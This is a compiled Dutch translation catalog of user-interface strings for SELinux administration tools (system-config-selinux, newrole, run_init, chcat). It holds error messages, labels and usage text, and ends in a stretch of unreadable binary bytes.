Kan semanage transactie niet uitvoerenKan geen SELinux gebruiker aanmaken voor %sKan geen sleutel aanmaken voor %sKan geen sleutel aanmaken voor %s/%sKan geen addr aanmaken voor %sKan geen context aanmaken voor %sKan geen context aanmaken voor %s/%sKan geen bestand context aanmaken voor %sKan geen interface aanmaken voor %sKan geen sleutel aanmaken voor %sKan geen inlog afbeelding aanmaken voor %sKan geen poort aanmaken voor %s/%sKan semanage handle niet creërenKan SELinux gebruiker %s niet verwijderenKan addr %s niet verwijderenKan Boolean %s niet verwijderenKan bestand context niet verwijderen voor %sKan interface %s niet verwijderenKan inlog afbeelding niet verwijderen voor %sKan poort %s/%s niet verwijderenKan bestand context %s niet verwijderenKan poort %s niet verwijderenKan afdwingende mode niet vaststellen.
Kan semanage verbinding niet tot stand brengenKan sleutel niet extraheren voor %sKan SELinux modules niet tonenKan SELinux gebruikers niet tonenKan addr's niet tonenKan Booleans niet tonenKan bestand contexten niet tonenKan interfaces niet tonenKan lokale bestand contexten niet tonenKan inlog afbeeldingen niet tonenKan poorten niet tonenKan rollen voor gebruiker %s niet tonenKan bestand contexten niet tonenKan poorten niet tonenKan SELinux gebruiker %s niet veranderenKan addr %s niet veranderenKan Boolean %s niet veranderenKan bestand context niet veranderen voor %sKan interface %s niet veranderenKan inlog afbeelding niet veranderen voor %sKan poort %s/%s niet veranderenKan bestand %s niet openen
Kan addr %s niet bevragenKan bestand context %s niet opvragenKan bestand context niet opvragen voor %sKan interface %s niet opvragenKan poort %s/%s niet opvragenKan seuser niet opvragen voor %sKan gebruiker niet opvragen voor %sKan toelatend domein %s niet verwijderen (verwijderen mislukte)Kan MLS niveau niet instellen voor %sKan MLS reeks niet instellen voor %sKan SELinux gebruiker niet instellen voor %sKan actieve waarde van Boolean %s niet instellenKan addr context niet instellen voor %sKan exec context niet instellen naar %s.
Kan bestand context niet instellen voor %sKan interface context niet instellen voor %sKan geen masker instellen voor %sKan boodschap context niet instellen voor %sKan mls velden in addr context niet instellen voor %sKan mls velden in bestand context niet instellen voor %sKan mls velden in interface context niet instellen voor %sKan mls velden in poort context niet instellen voor %s/%sKan naam niet instellen voor %sKan toelatend domein %s niet instellen (module installatie mislukte)Kan poort context niet instellen voor %s/%sKan rol in addr context niet instellen voor %sKan rol in bestand context niet instellen voor %sKan rol in interface context niet instellen voor %sKan rol in poort context niet instellen voor %s/%sKan type in addr context niet instellen voor %sKan type in bestand context niet instellen voor %sKan type in interface context niet instellen voor %sKan type in poort context niet instellen voor %s/%sKan gebruiker in addr context niet instellen voor %sKan gebruiker in bestand context niet instellen voor %sKan gebruiker in interface context niet instellen voor %sKan gebruiker in poort context niet instellen voor %s/%sKan semanage transactie niet startenKan MLS aangezet status niet testenKan standaard type niet verkrijgen.
Maak/bewerk tijdelijke bestanden in /tmpCronHuidige afdwingende modeAangepastDBUS Systeem DaemonDatabases%s wissenVerwijder bestand contextVerwijder netwerk poortVerwijder SELinux gebruikers afbeeldingVerwijder gebruikerBeschrijvingZet audit uitZet SELinux bescherming uit voor Cluster serverZet SELinux bescherming uit voor EvolutionZet SELinux bescherming uit voor Hal daemonZet SELinux bescherming uit voor NIS wachtwoord daemonZet SELinux bescherming uit voor NIS transfer daemonZet SELinux bescherming uit voor NetworkManagerZet SELinux bescherming uit voor ThunderbirdZet SELinux bescherming voor acct daemon uitZet SELinux bescherming uit voor amandaZet SELinux bescherming uit voor amavisZet SELinux bescherming uit voor apmd daemonZet SELinux bescherming uit voor arpwatch daemonZet SELinux bescherming uit voor auditd daemonZet SELinux bescherming uit voor automount daemonZet SELinux bescherming uit voor avahiZet SELinux bescherming uit voor bluetooth daemonZet SELinux bescherming uit voor canna daemonZet SELinux bescherming uit voor cardmgr daemonZet SELinux bescherming uit voor ciped daemonZet SELinux bescherming uit voor clamd daemonZet SELinux bescherming uit voor clamscanZet SELinux bescherming uit voor clvmdZet SELinux bescherming uit voor comsat daemonZet SELinux bescherming uit voor courier daemonZet SELinux bescherming uit voor cpucontrol daemonZet SELinux bescherming uit voor cpuspeed daemonZet SELinux bescherming uit voor crond daemonZet SELinux bescherming uit voor cups hplip daemonZet SELinux bescherming uit voor cups back-end serverZet SELinux bescherming uit voor cupsd daemonZet SELinux bescherming uit voor cupsd_lpdZet SELinux bescherming uit voor cvs daemonZet SELinux bescherming uit voor cyrus daemonZet SELinux bescherming uit voor dbskkd daemonZet SELinux bescherming uit voor dbusd daemonZet SELinux bescherming uit voor dccdZet SELinux bescherming uit voor dccifdZet SELinux bescherming uit voor dccmZet SELinux bescherming uit voor ddt daemonZet SELinux bescherming uit voor dwvfsd daemonZet SELinux bescherming uit voor dhcpc daemonZet SELinux bescherming uit voor dhcpd daemonZet SELinux bescherming uit voor dictd daemonZet SELinux bescherming uit voor distccd daemonZet SELinux bescherming uit voor dmesg daemonZet SELinux bescherming uit voor dnsmasq daemonZet SELinux bescherming uit voor dovecot daemonZet SELinux bescherming uit voor entropyd daemonZet SELinux bescherming uit voor fetchmailZet SELinux bescherming uit voor fingerd daemonZet SELinux bescherming uit voor freshclam daemonZet SELinux bescherming uit voor fsdaemon daemonZet SELinux bescherming uit voor spellenZet SELinux bescherming uit voor gpm daemonZet SELinux bescherming uit voor gss daemonZet SELinux bescherming uit voor hostname daemonZet SELinux bescherming uit voor hotplug daemonZet SELinux bescherming uit voor howl daemonZet SELinux bescherming uit voor http suexecZet SELinux bescherming uit voor httpd rotatelogsZet SELinux bescherming uit voor hwclock daemonZet SELinux bescherming uit voor i18n daemonZet SELinux bescherming uit voor imazesrv daemonZet SELinux bescherming uit voor inetd child daemonsZet SELinux bescherming uit voor inetd daemonZet SELinux bescherming uit voor innd daemonZet SELinux bescherming uit voor iptables daemonZet SELinux bescherming uit voor ircd daemonZet SELinux bescherming uit voor irqbalance daemonZet SELinux bescherming uit voor iscsi daemonZet SELinux bescherming uit voor jabberd daemonZet SELinux bescherming uit voor kadmind daemonZet SELinux bescherming uit voor klogd daemonZet SELinux bescherming uit voor krb5kdc daemonZet SELinux bescherming uit voor ktalk daemonZet SELinux bescherming uit voor kudzu daemonZet SELinux bescherming uit voor locate daemonZet SELinux bescherming uit voor lpd daemonZet SELinux bescherming uit voor lrrd daemonZet SELinux bescherming uit voor lvm daemonZet SELinux bescherming uit voor mailmanZet SELinux bescherming uit voor mdadm daemonZet SELinux bescherming uit voor monopd daemonZet SELinux bescherming uit voor mrtg daemonZet SELinux bescherming uit voor mysqld daemonZet SELinux bescherming uit voor nagios daemonZet SELinux bescherming uit voor named daemonZet SELinux bescherming uit voor nessusd daemonZet SELinux bescherming uit voor nfsd daemonZet SELinux bescherming uit voor nmbd daemonZet SELinux bescherming uit voor nrpe daemonZet SELinux bescherming uit voor nscd daemonZet SELinux bescherming uit voor nsd daemonZet SELinux bescherming uit voor ntpd daemonZet SELinux bescherming uit voor oddjobZet SELinux bescherming uit voor oddjob_mkhomedirZet SELinux bescherming uit voor openvpn daemonZet SELinux bescherming uit voor pam daemonZet SELinux bescherming uit voor pegasusZet SELinux bescherming uit voor perdition daemonZet SELinux bescherming uit voor portmap daemonZet SELinux bescherming uit voor portslave daemonZet SELinux bescherming uit voor postfixZet SELinux bescherming uit voor postgresql daemonZet SELinux bescherming uit voor pptpZet SELinux bescherming uit voor prelink daemonZet SELinux bescherming uit voor privoxy daemonZet SELinux bescherming uit voor ptal daemonZet SELinux bescherming uit voor pxe daemonZet SELinux bescherming uit voor pyzordZet SELinux bescherming uit voor quota daemonZet SELinux bescherming uit voor radiusd daemonZet SELinux bescherming uit voor radvd daemonZet SELinux bescherming uit voor rdiscZet SELinux bescherming uit voor readaheadZet SELinux bescherming uit voor restorecondZet SELinux bescherming uit voor rhgb daemonZet SELinux bescherming uit voor ricciZet SELinux bescherming uit voor ricci_modclusterdZet SELinux bescherming uit voor rlogind daemonZet SELinux bescherming uit voor rpcd daemonZet SELinux bescherming uit voor rshdZet SELinux bescherming uit voor rsync daemonZet SELinux bescherming uit voor saslauthd daemonZet SELinux bescherming uit voor scannerdaemon daemonZet SELinux bescherming uit voor sendmail daemonZet SELinux bescherming uit voor setransZet SELinux bescherming uit voor setroubleshoot daemonZet SELinux bescherming uit voor Slapd daemonZet SELinux bescherming uit voor slrnpull daemonZet SELinux bescherming uit voor smbd daemonZet SELinux bescherming uit voor snmpd daemonZet SELinux bescherming uit voor snort daemonZet SELinux bescherming uit voor sound daemonZet SELinux bescherming uit voor soundd daemonZet SELinux bescherming uit voor spamd daemonZet SELinux bescherming uit voor speedmgmt daemonZet SELinux bescherming uit voor squid daemonZet SELinux bescherming uit voor ssh daemonZet SELinux bescherming uit voor stunnel daemonZet SELinux bescherming uit voor swat daemonZet SELinux bescherming uit voor sxid daemonZet SELinux bescherming uit voor syslogd daemonZet SELinux bescherming uit voor systeem cron takenZet SELinux bescherming uit voor tcp daemonZet SELinux bescherming uit voor telnet daemonZet SELinux bescherming uit voor tftpd daemonZet SELinux bescherming uit voor web browsersZet SELinux bescherming uit voor transpoxy daemonZet SELinux bescherming uit voor udev daemonZet SELinux bescherming uit voor uml daemonZet SELinux bescherming uit voor updfstab daemonZet SELinux bescherming uit voor uptimed daemonZet SELinux bescherming uit voor uucp daemonZet SELinux bescherming uit voor vmware daemonZet SELinux bescherming uit voor watchdog daemonZet SELinux bescherming uit voor winbind daemonZet SELinux bescherming uit voor xdm daemonZet SELinux bescherming uit voor xen controleZet SELinux bescherming uit voor xen daemonZet SELinux bescherming uit voor xfs daemonZet SELinux bescherming uit voor ypbind daemonZet SELinux bescherming uit voor ypserv daemonUitgezetUitgezet
Toelatend
Afdwingend
Sta geen enkel proces toe om kernel modules te ladenSta geen enkel proces toe om de kernel SELinux tactiek te veranderenSta geen overgang toe naar sysadm_t, gevolgen voor sudo en su Audit geen zaken waarvan we weten dat ze kapot, zijn maar die geen beveiliging risico's zijnBewerk netwerk poortZet audit aanZet de extra audit regels, die normaal niet gerapporteerd worden in de log bestanden, aan of uit.AfdwingendVul het volledige pad in voor het programma dat beperkt moet worden.Vul het volledige pad in voor het init script dat gebruikt wordt om de beperkte toepassing te starten.Vul een unieke naam in voor de beperkte toepassing of gebruiker rol.Fout bij het toewijzen van geheugen.
Fout bij het toewijzen van argv0 van de shell.
Fout bij het veranderen van uid, afbreken.
Fout bij het verbinden met het audit systeem.
Fout bij het uitzetten van SETUID mogelijkheid, afbreken
Fout bij het uitzetten van capabilities, afbreken
Fout bij het vrijgeven van caps
Fout bij het initialiseren van capabilities, afbreken.
Fout bij het opnieuw instellen van KEEPCAPS, afbreken
Fout bij het versturen van audit boodschap.
Fout bij het instellen van KEEPCAPS, afbreken
Fout bij het instellen van capabilities, afbreken.
Fout! Kon %s niet openen.
Fout! Shell is niet geldig.
Fout: meerdere niveaus opgegeven
Fout: meerdere rollen opgegeven
Fout: meerdere typen opgegeven
Fout: Niveaus op een onbeveiligde terminal veranderen is niet toegestaan 
ProgrammaBestaande gebruiker rollenBestaande _gebruikerAfsluiten van tty op een juiste manier is mislukt
Bestand
specificatieBestand
typeBestand context bestandBestand labelingBestand specificatieBestand typeBestand context voor %s is gedefinieerd in tactiek, kan niet worden verwijderdBestand context voor %s is niet gedefinieerdFilterGPLSpellenMaak een nieuwe tactiek module aanGroep overzichtHTTPD serviceInit scriptIs interactief met de terminalInterface %s is gedefinieerd in tactiek, kan niet worden verwijderdInterface %s is niet gedefinieerdInterface bestandInternet Services Daemon (inetd)Internet Service Daemon zijn daemons die gestart wordt door xinetdOngeldige bestand specificatieKerberosLabelenLinux groep %s bestaat nietLinux gebruiker %s bestaat nietLijst overzichtLaad tactiek moduleTactiek module ladenAfsluiten...Inlog
naamInlog '%s' is vereistInlog naamInlog afbeelding voor %s is gedefinieerd in tactiek, kan niet worden verwijderdInlog afbeelding voor %s is niet gedefinieerdMCS niveauMCS reeksMLSMLS/MLS/
MCS bereikMLS/MCS
niveauMLS/MCS reeksGeheugen beschermingMinimale terminal gebruiker rolMinimale X Windows gebruiker rol%s veranderenVerander bestand contextVerander SELinux gebruikers afbeeldingVerander gebruikerVerander een bestaand inlog gebruiker record.Module %s.pp is al geladen in de huidige tactiek.
Wil je verder gaan?Module naamAankoppelenNFSNISNaamNaam serviceNetwerk configuratieNetwerk poortGeen context in bestand %s
Node adres is vereistNode netmasker is vereistNog niet geïmplementeerdFout in opties %s Geheugen is vol!
Wachtwoord:ToelatendPolgenTactiek mapTactiek modulePoortPoort %s/%s is al gedefinieerdPoort %s/%s is gedefinieerd in tactiek, kan niet worden verwijderdPoort %s/%s is niet gedefinieerdPoort nummerPoort is vereistPoort nummer "%s" is niet geldig.  0 < POORT_NUMMER < 65536 Poorten moeten nummers of nummer reeksen zijn van 1 tot %d.PrefixAfdrukkenProces domeinProtoProtocolProtocol udp of tcp is vereistRed Hat 2007Opnieuw labelen bij de volgende systeem opstart.Verwijder laadbare tactiek moduleVereist tenminste één categorieVereist prefix of rollenVereist prefix, rollen, niveau of bereikVereist setypeVereist setype of serangeVereist setype, serange of seuserVereist seuser of serangeSchakel de Boolean instelling om naar de systeem standaardRolRoot beheerder gebruiker rolVoer de Booleans afsluiten assistent uitSASL authenticatie serverSELinux
gebruikerSELinux beheerSELinux interfaceSELinux tactiek generatie gereedschapSELinux poort
typeSELinux poort typeSELinux rollenSELinux service beschermingSELinux typeSELinux type is vereistSELinux gebruikerSELinux BooleanSELinux fcontextSELinux tactiek is niet beheerd of krijg geen toegang tot opslag.SELinux gebruiker %s is gedefinieerd in tactiek, kan niet worden verwijderdSELinux gebruiker %s is niet gedefinieerdSELinux gebruiker '%s' is vereistSSHSambaSelecteer beheer objectSelecteer poortenSelecteer root beheerder gebruiker rol als deze gebruiker de machine gaat beheren terwijl deze draait als root.  Deze gebruiker zal niet rechtstreeks op het systeem kunnen inloggen.Selecteer map om tactiek bestanden in aan te makenSelecteer map(pen) waarvan de beperkte toepassing eigenaar is en naar schrijftSelecteer een uitvoerbaar bestand om te beperken.Selecteer bestand(en) die de beperkte toepassing aanmaakt of naar schrijftSelecteer dit als je het gehele bestandssysteem bij de volgende systeem opstart opnieuw wilt labelen.  Opnieuw labelen kan veel tijd kosten, afhankelijk van de grootte van het systeem.  Als je het tactiek type verandert of je gaat van uitgezet naar afdwingend, is opnieuw labelen vereist.Selecteer een init script om te beperken.Selecteer de domeinen die je deze gebruiker wilt laten beheren.Selecteer de gebruiker rollen die over zullen gaan naar de domeinen van deze toepassing.SELinux
bestand typeSemanage transactie is al bezigSemanage transactie is niet bezigStuur audit boodschappenStuur emailSetup scriptSorry, -l mag alleen worden gebruikt met SELinux MLS ondersteuning.
Sorry, newrole mag alleen worden gebruikt met een SELinux kernel.
Sorry, run_init mag alleen worden gebruikt met een SELinux kernel.
Spam beschermingSquidStandaard Init DaemonStandaard Init Daemon is een daemon die bij het opstarten van het systeem gestart wordt via init scripts.  Vereist gewoonlijk een script in /etc/rc.d/init.dStatusSysteem standaard afdwingende modeSysteem standaard tactiek type:Deze gebruiker kan inloggen op een machine met X of een terminal.  Standaard zal deze gebruiker geen setuid, geen netwerk, geen sudo, geen su hebbenDeze gebruiker wil alleen inloggen op een machine met een terminal of inloggen op afstand.  Standaard zal deze gebruiker  geen setuid, geen su, geen sudo hebben.Om dit tactiek pakket te activeren, voer uit:Schakel om tussen Aangepaste en Alle BooleansSchakel om tussen Aangepaste en Alle poortenSchakel om tussen alle en aangepast bestand contextOvergang van staff SELinux gebruiker naar Web browser domeinOvergang van sysadm SELinux gebruiker naar Web browser domeinOvergang van user SELinux gebruiker naar Web browser domeinOvergang van xguest SELinux gebruiker naar Web browser domeinType %s_t is al gedefinieerd in de huidige tactiek.
Wil je verder gaan?Type afdwingingd bestandType is vereistGEBRUIK: run_init <script> <argumenten ...>
  waarin: <script> de naam is van het init script dat moet worden uitgevoerd,
        <argumenten ...> de argumenten zijn voor dat script.GEBRUIKER types krijgen automatisch een tmp typeNiet in staat om geheugen te reserveren voor new_contextNiet in staat om de omgeving op te schonen
Niet in staat om een lege signaal set te verkrijgen
Niet in staat om de omgeving terug te zetten, afbreken
Niet in staat om tty label terug te zetten...
Niet in staat om SIGHUP verwerker in te stellen
Universele SSL tunnelOnbekend of ontbrekend protocolNiet-gereserveerde poorten (> 1024)Gebruik %s -LGebruik %s -L -l gebruikerGebruik %s -d bestand ...Gebruik %s -l -d gebruiker ...Gebruik %s -l CATEGORIE gebruiker ...Gebruik %s -l [[+|-]CATEGORIE],...]q gebruiker ...Gebruik %s CATEGORIE bestand ...Gebruik %s [[+|-]CATEGORIE],...]q bestand ...Gebruik -- om de optie lijst te beëindigen.  BijvoorbeeldGebruiker toepassingGebruiker toepassing is elke toepassing die je wilt beperken en gestart wordt door een gebruikerGebruikers afbeeldingGebruiker privilegesGebruiker rolGebruiker met volledige netwerk, geen setuid toepassingen zonder overgang, geen su, kan sudo gebruiken voor root beheerder rolGebruiker met volledig netwerk, geen setuid toepassingen zonder overgang, geen sudo, geen su.Gebruik Pam voor authenticatieGebruik dbusGebruik nsswitch of getpw* aanroepenVerifieer naamVersieWaarschuwing! Kan tty informatie niet ophalen.
Waarschuwing! Kan context voor %s niet terugzetten
Web toepassing/script (CGI)Web toepassingenWeb toepassingen/Script (CGI) CGI script gestart door de web server (apache)Schrijf syslog boodschappen	XENXServerJe moet ten minste een rol voor %s toevoegenJe moet een uitvoerbaar bestand opgevenJe moet een naam invullen voor jouw beperkte proces/gebruikerJe moet het uitvoerbare pad invullen voor jouw beperkt procesJe moet een gebruiker selecterenJe moet een van de volgende waarden opgeven: %s_Verwijderen_Eigenschappenallealle bestanden
reguliere bestanden
map
karakter apparaat
blok apparaat
socket
symbolische link
named pipe
authenticatie mislukt.
kan geen geldige ingang in het passwd bestand vinden.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential juserfout bij het lezen van de PAM service instelling.
samenstellen van nieuwe reeks met niveau %s is mislukt
converteren van nieuwe context naar string is mislukt
uitvoeren van shell is mislukt
verkrijgen van account informatie is mislukt
verkrijgen van nieuwe context is mislukt.
verkrijgen van old_context is mislukt.
initialiseren van PAM is mislukt
instellen van PAM_TTY is mislukt
instellen van nieuw bereik %s is mislukt
instellen van nieuwe rol %s is mislukt
instellen van nieuw type %s is mislukt
getpass kan /dev/tty niet openen
globaallabel37label38label39label41label42label44label50label59newrole:  %s:  fout op regel %lu.
newrole: forking mislukt: %snewrole: incorrect wachtwoord voor %s
newrole: service naam configuratie hashtable overflow
uitaanpppdrsyncrun_init: incorrect wachtwoord voor %s
system-config-selinuxPeter van Egdom <p.van.egdom@gmail.com>, Geert Warrink <geert.warrink@onsnet.nu>typeonbekendgebruik:  %s [-qi]
use_syslog moet een boolean waarde hebben
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`